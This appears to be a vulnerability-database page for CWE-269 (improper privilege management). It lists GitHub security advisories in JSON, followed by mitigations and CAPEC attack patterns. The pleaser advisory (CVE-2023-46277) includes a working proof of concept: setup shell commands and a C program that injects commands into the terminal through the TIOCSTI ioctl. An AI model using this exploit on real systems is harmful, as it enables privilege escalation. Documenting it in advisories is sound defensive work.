CWE-269
DiscouragedImproper Privilege Management
Abstraction: Class · Status: Draft
The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.
5451 vulnerabilities reference this CWE, most recent first.
GHSA-CG76-745G-64C2
Vulnerability from github – Published: 2022-05-24 17:38 – Updated: 2024-10-08 18:32Windows Event Tracing Elevation of Privilege Vulnerability
{
"affected": [],
"aliases": [
"CVE-2021-1662"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-01-12T20:15:00Z",
"severity": "HIGH"
},
"details": "Windows Event Tracing Elevation of Privilege Vulnerability",
"id": "GHSA-cg76-745g-64c2",
"modified": "2024-10-08T18:32:57Z",
"published": "2022-05-24T17:38:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-1662"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1662"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1662"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CG7Q-W674-M33V
Vulnerability from github – Published: 2022-05-13 01:23 – Updated: 2022-05-13 01:23The XrayWrapper implementation in Mozilla Firefox before 29.0 and SeaMonkey before 2.26 allows user-assisted remote attackers to bypass intended access restrictions via a crafted web site that is visited in the debugger, leading to unwrapping operations and calls to DOM methods on the unwrapped objects.
{
"affected": [],
"aliases": [
"CVE-2014-1526"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2014-04-30T10:49:00Z",
"severity": "MODERATE"
},
"details": "The XrayWrapper implementation in Mozilla Firefox before 29.0 and SeaMonkey before 2.26 allows user-assisted remote attackers to bypass intended access restrictions via a crafted web site that is visited in the debugger, leading to unwrapping operations and calls to DOM methods on the unwrapped objects.",
"id": "GHSA-cg7q-w674-m33v",
"modified": "2022-05-13T01:23:26Z",
"published": "2022-05-13T01:23:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-1526"
},
{
"type": "WEB",
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=988106"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201504-01"
},
{
"type": "WEB",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-May/132437.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-updates/2014-05/msg00010.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-updates/2014-05/msg00033.html"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/59866"
},
{
"type": "WEB",
"url": "http://www.mozilla.org/security/announce/2014/mfsa2014-47.html"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1030163"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1030164"
},
{
"type": "WEB",
"url": "http://www.ubuntu.com/usn/USN-2185-1"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-CG95-95JV-Q4QM
Vulnerability from github – Published: 2022-05-13 01:32 – Updated: 2022-05-13 01:32IBM Campaign 9.1.0 and 9.1.2 could allow a local user to obtain admini privileges due to the application not validating access permissions. IBM X-Force ID: 153382.
{
"affected": [],
"aliases": [
"CVE-2018-1941"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-12-05T17:29:00Z",
"severity": "HIGH"
},
"details": "IBM Campaign 9.1.0 and 9.1.2 could allow a local user to obtain admini privileges due to the application not validating access permissions. IBM X-Force ID: 153382.",
"id": "GHSA-cg95-95jv-q4qm",
"modified": "2022-05-13T01:32:28Z",
"published": "2022-05-13T01:32:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1941"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/153382"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/docview.wss?uid=ibm10743115"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CGCM-V3M9-CVV2
Vulnerability from github – Published: 2022-05-24 17:27 – Updated: 2024-01-01 00:30An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'.
{
"affected": [],
"aliases": [
"CVE-2020-1030"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-09-11T17:15:00Z",
"severity": "HIGH"
},
"details": "An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka \u0027Windows Print Spooler Elevation of Privilege Vulnerability\u0027.",
"id": "GHSA-cgcm-v3m9-cvv2",
"modified": "2024-01-01T00:30:40Z",
"published": "2022-05-24T17:27:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1030"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1030"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CGF8-H3FP-H956
Vulnerability from github – Published: 2023-10-20 06:30 – Updated: 2024-09-12 18:41please (aka pleaser) through 0.5.4 allows privilege escalation through the TIOCSTI and/or TIOCLINUX ioctl. (If both TIOCSTI and TIOCLINUX are disabled, this cannot be exploited.)
Here is how to see it in action:
$ cd "$(mktemp -d)"
$ git clone --depth 1 https://gitlab.com/edneville/please.git
$ cd please/
$ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9
$ cargo test && cargo build --release
$ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini
$ sudo chown root:root ./target/release/please
$ sudo chmod u+s ./target/release/please
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>
int main(void) {
const char *text = "id\n";
while (*text)
ioctl(0, TIOCSTI, text++);
return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody
Please note that:
This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "pleaser"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.5.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-46277"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": true,
"github_reviewed_at": "2023-10-20T22:37:41Z",
"nvd_published_at": "2023-10-20T05:15:08Z",
"severity": "HIGH"
},
"details": "please (aka pleaser) through 0.5.4 allows privilege escalation through the TIOCSTI and/or TIOCLINUX ioctl. (If both TIOCSTI and TIOCLINUX are disabled, this cannot be exploited.)\n\nHere is how to see it in action:\n\n```\n$ cd \"$(mktemp -d)\"\n$ git clone --depth 1 https://gitlab.com/edneville/please.git\n$ cd please/\n$ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9\n$ cargo test \u0026\u0026 cargo build --release\n$ echo \"[${USER}_as_nobody]\"$\u0027\\nname=\u0027\"${USER}\"$\u0027\\ntarget=nobody\\nrule=.*\\nrequire_pass=false\u0027 | sudo tee /etc/please.ini\n$ sudo chown root:root ./target/release/please\n$ sudo chmod u+s ./target/release/please\n$ cat \u003c\u003cTIOCSTI_C_EOF | tee TIOCSTI.c\n#include \u003csys/ioctl.h\u003e\n\nint main(void) {\n const char *text = \"id\\n\";\n while (*text)\n ioctl(0, TIOCSTI, text++);\n return 0;\n}\nTIOCSTI_C_EOF\n$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c\n$ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody\n```\n\nPlease note that:\n\nThis affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.\n",
"id": "GHSA-cgf8-h3fp-h956",
"modified": "2024-09-12T18:41:42Z",
"published": "2023-10-20T06:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46277"
},
{
"type": "WEB",
"url": "https://github.com/rustsec/advisory-db/pull/1798"
},
{
"type": "PACKAGE",
"url": "https://gitlab.com/edneville/please"
},
{
"type": "WEB",
"url": "https://gitlab.com/edneville/please/-/issues/13"
},
{
"type": "WEB",
"url": "https://gitlab.com/edneville/please/-/merge_requests/69#note_1594254575"
},
{
"type": "WEB",
"url": "https://rustsec.org/advisories/RUSTSEC-2023-0066.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Pleaser privilege escalation vulnerability"
}
GHSA-CGFP-7G8F-3V37
Vulnerability from github – Published: 2022-05-24 19:13 – Updated: 2022-05-24 19:13Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36930.
{
"affected": [],
"aliases": [
"CVE-2021-26436"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-09-02T23:15:00Z",
"severity": "HIGH"
},
"details": "Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36930.",
"id": "GHSA-cgfp-7g8f-3v37",
"modified": "2022-05-24T19:13:01Z",
"published": "2022-05-24T19:13:01Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-26436"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26436"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CGHV-P6J4-5CH6
Vulnerability from github – Published: 2025-03-14 12:32 – Updated: 2025-03-14 12:32The Realteo - Real Estate Plugin by Purethemes plugin for WordPress, used by the Findeo Theme, is vulnerable to authentication bypass in all versions up to, and including, 1.2.8. This is due to insufficient role restrictions in the 'do_register_user' function. This makes it possible for unauthenticated attackers to register an account with the Administrator role.
{
"affected": [],
"aliases": [
"CVE-2025-2232"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-14T12:15:14Z",
"severity": "CRITICAL"
},
"details": "The Realteo - Real Estate Plugin by Purethemes plugin for WordPress, used by the Findeo Theme, is vulnerable to authentication bypass in all versions up to, and including, 1.2.8. This is due to insufficient role restrictions in the \u0027do_register_user\u0027 function. This makes it possible for unauthenticated attackers to register an account with the Administrator role.",
"id": "GHSA-cghv-p6j4-5ch6",
"modified": "2025-03-14T12:32:02Z",
"published": "2025-03-14T12:32:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2232"
},
{
"type": "WEB",
"url": "https://docs.purethemes.net/findeo/knowledge-base/changelog-findeo"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/abe73ecd-1325-4d6d-8545-d27f6116ca43?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CGMV-C2QG-XXQX
Vulnerability from github – Published: 2022-06-09 00:00 – Updated: 2022-06-18 00:00ToaruOS 1.99.2 is affected by incorrect access control via the kernel. Improper MMU management and having a low GDT address allows it to be mapped in userland. A call gate can then be written to escalate to CPL 0.
{
"affected": [],
"aliases": [
"CVE-2021-36710"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-08T15:15:00Z",
"severity": "HIGH"
},
"details": "ToaruOS 1.99.2 is affected by incorrect access control via the kernel. Improper MMU management and having a low GDT address allows it to be mapped in userland. A call gate can then be written to escalate to CPL 0.",
"id": "GHSA-cgmv-c2qg-xxqx",
"modified": "2022-06-18T00:00:24Z",
"published": "2022-06-09T00:00:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36710"
},
{
"type": "WEB",
"url": "https://github.com/mehsauce/kowasuos/blob/master/exploits/kowasu-sysfunc-strikes-back.c"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CGRG-X34R-78F3
Vulnerability from github – Published: 2022-05-13 01:07 – Updated: 2024-03-01 20:07An issue was discovered in Cloud Foundry Foundation cf-release versions prior to v260; UAA release 2.x versions prior to v2.7.4.16, 3.6.x versions prior to v3.6.10, 3.9.x versions prior to v3.9.12, and other versions prior to v3.17.0; and UAA bosh release (uaa-release) 13.x versions prior to v13.14, 24.x versions prior to v24.9, 30.x versions prior to 30.2, and other versions prior to v36. Privileged users in one zone are allowed to perform a password reset for users in a different zone.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.cloudfoundry.identity:cloudfoundry-identity-server"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.7.4.16"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.cloudfoundry.identity:cloudfoundry-identity-server"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.6.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.cloudfoundry.identity:cloudfoundry-identity-server"
},
"ranges": [
{
"events": [
{
"introduced": "3.7.0"
},
{
"fixed": "3.9.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.cloudfoundry.identity:cloudfoundry-identity-server"
},
"ranges": [
{
"events": [
{
"introduced": "3.10.0"
},
{
"fixed": "3.17.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-4991"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": true,
"github_reviewed_at": "2024-03-01T20:07:35Z",
"nvd_published_at": "2017-06-13T06:29:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in Cloud Foundry Foundation cf-release versions prior to v260; UAA release 2.x versions prior to v2.7.4.16, 3.6.x versions prior to v3.6.10, 3.9.x versions prior to v3.9.12, and other versions prior to v3.17.0; and UAA bosh release (uaa-release) 13.x versions prior to v13.14, 24.x versions prior to v24.9, 30.x versions prior to 30.2, and other versions prior to v36. Privileged users in one zone are allowed to perform a password reset for users in a different zone.",
"id": "GHSA-cgrg-x34r-78f3",
"modified": "2024-03-01T20:07:35Z",
"published": "2022-05-13T01:07:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-4991"
},
{
"type": "WEB",
"url": "https://github.com/cloudfoundry/uaa/commit/2ca35f1723e039aa7d2318134b05d02e40072a18"
},
{
"type": "WEB",
"url": "https://github.com/cloudfoundry/uaa/commit/ba23bcf109704ab2eae519b705d7b2a75e023553"
},
{
"type": "WEB",
"url": "https://github.com/cloudfoundry/uaa/commit/bbf6751bc0d87c4a3aaf21b54e26ce328ab998b3"
},
{
"type": "WEB",
"url": "https://github.com/cloudfoundry/uaa/commit/eb3f86054489039e11eabd54a8ec9a46c22abfc8"
},
{
"type": "PACKAGE",
"url": "https://github.com/cloudfoundry/uaa"
},
{
"type": "WEB",
"url": "https://www.cloudfoundry.org/cve-2017-4991"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Cloud Foundry UAA password reset vulnerability"
}
GHSA-CGV7-RQXR-Q664
Vulnerability from github – Published: 2025-11-05 17:48 – Updated: 2025-11-05 17:48Dell CloudLink, versions prior to 8.1.1, contain a vulnerability where a privileged user with known password can run CLI Escape Vulnerability to gain control of system.
{
"affected": [],
"aliases": [
"CVE-2025-46364"
],
"database_specific": {
"cwe_ids": [
"CWE-269"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-05T17:15:41Z",
"severity": "CRITICAL"
},
"details": "Dell CloudLink, versions prior to 8.1.1, contain a vulnerability where a privileged user with known password can run CLI Escape Vulnerability to gain control of system.",
"id": "GHSA-cgv7-rqxr-q664",
"modified": "2025-11-05T17:48:29Z",
"published": "2025-11-05T17:48:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46364"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000384363/dsa-2025-374-security-update-for-dell-cloudlink-multiple-security-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-1
Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.
Mitigation MIT-48
Strategy: Separation of Privilege
Follow the principle of least privilege when assigning access rights to entities in a software system.
Mitigation MIT-49
Strategy: Separation of Privilege
Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource.
CAPEC-122: Privilege Abuse
An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.
CAPEC-233: Privilege Escalation
An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.
CAPEC-58: Restful Privilege Elevation
An adversary identifies a Rest HTTP (Get, Put, Delete) style permission method allowing them to perform various malicious actions upon server data due to lack of access control mechanisms implemented within the application service accepting HTTP messages.